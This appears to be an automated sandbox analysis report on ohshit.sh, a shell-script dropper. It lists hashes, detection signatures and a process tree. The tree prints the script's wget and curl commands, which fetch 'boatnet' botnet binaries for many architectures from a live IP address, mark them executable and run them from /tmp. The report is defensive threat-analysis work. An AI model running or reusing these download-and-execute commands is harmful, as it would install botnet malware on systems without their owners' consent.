Analysis
max time kernel: 3s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 23-12-2024 05:02
Static task: static1
Behavioral task: behavioral1 (sample: ohshit.sh, resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample: ohshit.sh, resource: debian9-armhf-20240729-en)
Behavioral task: behavioral3 (sample: ohshit.sh, resource: debian9-mipsbe-20240611-en)
General
Target: ohshit.sh
Size: 3KB
MD5: e0ccd217979419469e913cbef10872f3
SHA1: 6bbef022dcf450af81bee90522e4c82069c84064
SHA256: 288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71
SHA512: 38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce
Malware Config

Signatures

File and Directory Permissions Modification (1 TTP, 15 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
PID   Process
1543  chmod
1561  chmod
1579  chmod
1513  chmod
1531  chmod
1537  chmod
1555  chmod
1585  chmod
1501  chmod
1507  chmod
1525  chmod
1573  chmod
1519  chmod
1549  chmod
1567  chmod

Executes dropped EXE (15 IoCs)
IoC       PID   Process
/tmp/WTF  1502  WTF
/tmp/WTF  1508  WTF
/tmp/WTF  1514  WTF
/tmp/WTF  1520  WTF
/tmp/WTF  1526  WTF
/tmp/WTF  1532  WTF
/tmp/WTF  1538  WTF
/tmp/WTF  1544  WTF
/tmp/WTF  1550  WTF
/tmp/WTF  1556  WTF
/tmp/WTF  1562  WTF
/tmp/WTF  1568  WTF
/tmp/WTF  1574  WTF
/tmp/WTF  1580  WTF
/tmp/WTF  1586  WTF

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
PID   Process
1504  wget
1505  curl
1506  cat

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
Description                   IoC       Process
File opened for modification  /tmp/WTF  ohshit.sh
Processes
Process tree (indentation = depth); columns: process, PID, command line, [signatures]

/tmp/ohshit.sh  PID 1493  cmd: /tmp/ohshit.sh  [Writes file to tmp directory]
    /usr/bin/wget  PID 1494  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.x86
    /usr/bin/curl  PID 1496  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86
    /bin/cat  PID 1500  cmd: cat boatnet.x86
    /bin/chmod  PID 1501  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1502  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1504  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.mips  [System Network Configuration Discovery]
    /usr/bin/curl  PID 1505  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips  [System Network Configuration Discovery]
    /bin/cat  PID 1506  cmd: cat boatnet.mips  [System Network Configuration Discovery]
    /bin/chmod  PID 1507  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1508  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1510  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.arc
    /usr/bin/curl  PID 1511  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc
    /bin/cat  PID 1512  cmd: cat boatnet.arc
    /bin/chmod  PID 1513  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1514  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1516  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.i468
    /usr/bin/curl  PID 1517  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i468
    /bin/cat  PID 1518  cmd: cat boatnet.i468
    /bin/chmod  PID 1519  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1520  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1522  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.i686
    /usr/bin/curl  PID 1523  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i686
    /bin/cat  PID 1524  cmd: cat boatnet.i686
    /bin/chmod  PID 1525  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1526  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1528  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.x86_64
    /usr/bin/curl  PID 1529  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_64
    /bin/cat  PID 1530  cmd: cat boatnet.x86_64
    /bin/chmod  PID 1531  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1532  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1534  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl
    /usr/bin/curl  PID 1535  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl
    /bin/cat  PID 1536  cmd: cat boatnet.mpsl
    /bin/chmod  PID 1537  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1538  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1540  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.arm
    /usr/bin/curl  PID 1541  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm
    /bin/cat  PID 1542  cmd: cat boatnet.arm
    /bin/chmod  PID 1543  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1544  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1546  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.arm5
    /usr/bin/curl  PID 1547  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm5
    /bin/cat  PID 1548  cmd: cat boatnet.arm5
    /bin/chmod  PID 1549  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1550  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1552  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.arm6
    /usr/bin/curl  PID 1553  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm6
    /bin/cat  PID 1554  cmd: cat boatnet.arm6
    /bin/chmod  PID 1555  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1556  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1558  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.arm7
    /usr/bin/curl  PID 1559  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm7
    /bin/cat  PID 1560  cmd: cat boatnet.arm7
    /bin/chmod  PID 1561  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1562  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1564  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.ppc
    /usr/bin/curl  PID 1565  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc
    /bin/cat  PID 1566  cmd: cat boatnet.ppc
    /bin/chmod  PID 1567  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1568  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1570  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.spc
    /usr/bin/curl  PID 1571  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc
    /bin/cat  PID 1572  cmd: cat boatnet.spc
    /bin/chmod  PID 1573  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1574  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1576  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.m68k
    /usr/bin/curl  PID 1577  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k
    /bin/cat  PID 1578  cmd: cat boatnet.m68k
    /bin/chmod  PID 1579  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1580  cmd: ./WTF  [Executes dropped EXE]
    /usr/bin/wget  PID 1582  cmd: wget http://154.213.187.234:3000/hiddenbin/boatnet.sh4
    /usr/bin/curl  PID 1583  cmd: curl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh4
    /bin/cat  PID 1584  cmd: cat boatnet.sh4
    /bin/chmod  PID 1585  cmd: chmod +x config-err-33Qurm netplan_n7sk0_n4 ohshit.sh snap-private-tmp ssh-lsfeayj48gJ0 systemd-private-059cb40b99db41b4b61ad49bcacf65f3-bolt.service-k0LJMz systemd-private-059cb40b99db41b4b61ad49bcacf65f3-colord.service-6uTkLF systemd-private-059cb40b99db41b4b61ad49bcacf65f3-ModemManager.service-moPm4Y systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-resolved.service-y7xJ7c systemd-private-059cb40b99db41b4b61ad49bcacf65f3-systemd-timedated.service-8C9GU7 WTF  [File and Directory Permissions Modification]
    /tmp/WTF  PID 1586  cmd: ./WTF  [Executes dropped EXE]